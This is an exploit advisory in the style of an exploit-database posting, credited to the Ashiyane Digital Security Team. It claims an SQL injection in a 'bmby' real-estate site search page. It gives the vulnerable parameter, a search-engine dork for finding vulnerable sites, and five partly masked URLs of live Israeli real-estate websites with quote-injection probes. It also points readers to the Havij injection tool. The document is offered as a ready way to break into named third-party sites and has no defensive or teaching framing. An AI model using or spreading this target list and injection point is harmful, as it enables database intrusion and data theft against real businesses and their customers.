############## # Exploit Title : bmby Sql Injection # # Exploit Author : Ashiyane Digital Security Team # # Home : ww.ashiyane.org # # Security Risk : High - SQL Injection # # Dork : inurl:"search.php?opr=" 0r "inurl:"search.php?opr=" # ############## #location: site/english/search.php?opr=realtor&id=[SQL] # # #DEm0: # www.mekXXX.co.il/english/search.php?opr=realtor&id=13293%27 # # www.goldXXXestate.co.il/english/search.php?opr=realtor&id=2559%27 # # www.staXXXd.co.il/english/search.php?opr=realtor&id=10276%27 # # www.geXXXre.co.il/english/search.php?opr=realtor&id=13043%27 # # www.marcuXXXlestate.co.il/english/search.php?opr=realtor&id=4066%27 # # # for inject use havij or inject manually # ############## #Greetz to: My Lord ALLAH ############## # # Amirh03in # ##############